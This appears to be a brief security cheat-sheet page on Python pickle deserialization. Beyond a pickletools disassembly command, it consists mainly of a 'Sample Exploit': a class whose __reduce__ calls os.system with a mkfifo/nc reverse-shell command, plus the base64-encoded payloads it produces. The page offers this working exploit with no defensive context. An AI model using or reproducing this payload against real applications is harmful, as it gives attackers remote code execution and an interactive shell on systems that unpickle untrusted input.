Python Deseralization - Documentation

Link to this headingPython Deseralization

Disassemble a Pickle File:

python -m pickletools <file.pickle> 0: \x80 PROTO 3 2: ] EMPTY_LIST 3: q BINPUT 0 5: ( MARK

Sample Exploit:

import base64, pickle import _pickle as cPickle class RCE(object): def __reduce__(self): import os cmd = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f' fn = 'os.system' return (eval(fn), (cmd,)) if __name__ == '__main__': #Pickle Exploit pickled = pickle.dumps(RCE()) print(base64.urlsafe_b64encode(pickled)) #b'gASVbgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFNybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI-JjEgfCBuYyAxMjcuMC4wLjEgMTIzNCA-IC90bXAvZpSFlFKULg==' #cPickle Exploit cpickled = cPickle.dumps(RCE()) print(base64.urlsafe_b64encode(cpickled)) #b'gASVbgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFNybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI-JjEgfCBuYyAxMjcuMC4wLjEgMTIzNCA-IC90bXAvZpSFlFKULg=='

Link to this headingPython Deseralization

Link to this headingPickle